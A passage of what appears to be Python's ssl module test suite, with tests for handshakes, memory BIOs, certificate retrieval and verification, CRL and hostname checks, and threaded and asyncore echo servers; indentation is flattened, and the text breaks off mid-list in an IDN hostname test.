# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_sni(self):
host, port = self.server_addr
server_names = []
# We store servername_cb arguments to make sure they match the host
def servername_cb(ssl_sock, server_name, initial_context):
server_names.append(server_name)
self.server_context.set_servername_callback(servername_cb)
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=SIGNING_CA)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
self.assertEqual(server_names, [host, host])
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_get_server_certificate_timeout(self):
def servername_cb(ssl_sock, server_name, initial_context):
time.sleep(0.2)
self.server_context.set_servername_callback(servername_cb)
with self.assertRaises(socket.timeout):
ssl.get_server_certificate(self.server_addr, ca_certs=SIGNING_CA,
timeout=0.1)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple I/O loop. Call func(*args) and, depending on the error we get
# (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
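# Handshaking over memory BIOs: wrap_bio() returns an SSLObject with no socket
# of its own, so the test must pump bytes between the BIOs and the TCP socket
# itself. A rough sketch of the pattern (this is what ssl_io_loop above does):
#
#     sslobj = ctx.wrap_bio(incoming, outgoing, server_hostname=hostname)
#     while True:
#         try:
#             sslobj.do_handshake()
#             break
#         except ssl.SSLWantReadError:
#             sock.sendall(outgoing.read())      # flush our handshake bytes
#             incoming.write(sock.recv(32768))   # feed the peer's reply
#     sock.sendall(outgoing.read())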
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
elif rc == errno.ENETUNREACH:
self.skipTest("Network unreachable.")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
if cert_binary is None:
sys.stdout.write(" client did not provide a cert\n")
else:
sys.stdout.write(f" cert binary is {len(cert_binary)}b\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
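# The handler speaks a tiny command protocol: an empty read (EOF) stops the
# handler, b'over' closes the connection, b'STARTTLS'/b'ENDTLS' switch TLS on
# and off when the server allows it, b'CB tls-unique' returns the channel
# binding, b'PHA' triggers post-handshake auth, b'HASCERT'/b'GETCERT' report
# the peer certificate, b'VERIFIEDCHAIN'/b'UNVERIFIEDCHAIN' report chain
# lengths, and anything else is echoed back lower-cased.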
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
elif stripped == b'VERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_verified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
elif stripped == b'UNVERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_unverified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError as e:
# handles SSLError and socket errors
if self.server.chatty and support.verbose:
if isinstance(e, ConnectionError):
# OpenSSL 1.1.1 sometimes raises
# ConnectionResetError when connection is not
# shut down gracefully.
print(
f" Connection reset by peer: {self.addr}"
)
else:
handle_error("Test server failure:\n")
try:
self.write(b"ERROR\n")
except OSError:
pass
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
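# Connections are accepted and served strictly one at a time: each
# ConnectionHandler thread is join()ed before the next accept(), so the
# server never handles two clients concurrently.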
self.sock.settimeout(1.0)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except TimeoutError as e:
if support.verbose:
sys.stdout.write(f' connection timeout {e!r}\n')
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.close()
def close(self):
if self.sock is not None:
self.sock.close()
self.sock = None
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
with warnings_helper.check_warnings():
# ignore Deprecation warnings
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version
):
        # If the OpenSSL configuration is strict and requires a more recent
        # TLS version, we have to lower the minimum to test old TLS versions.
with warnings_helper.check_warnings():
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
seclevel_workaround(server_context, client_context)
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
                # getpeercert() raises ValueError while the handshake isn't
                # done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
@unittest.skipUnless(
ssl.HAS_NEVER_CHECK_COMMON_NAME, "test requires hostname_checks_common_name"
)
def test_hostname_checks_common_name(self):
client_context, server_context, hostname = testing_context()
assert client_context.hostname_checks_common_name
client_context.hostname_checks_common_name = False
# default cert has a SAN
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
client_context, server_context, hostname = testing_context(NOSANFILE)
client_context.hostname_checks_common_name = False
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLCertVerificationError):
s.connect((HOST, server.port))
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
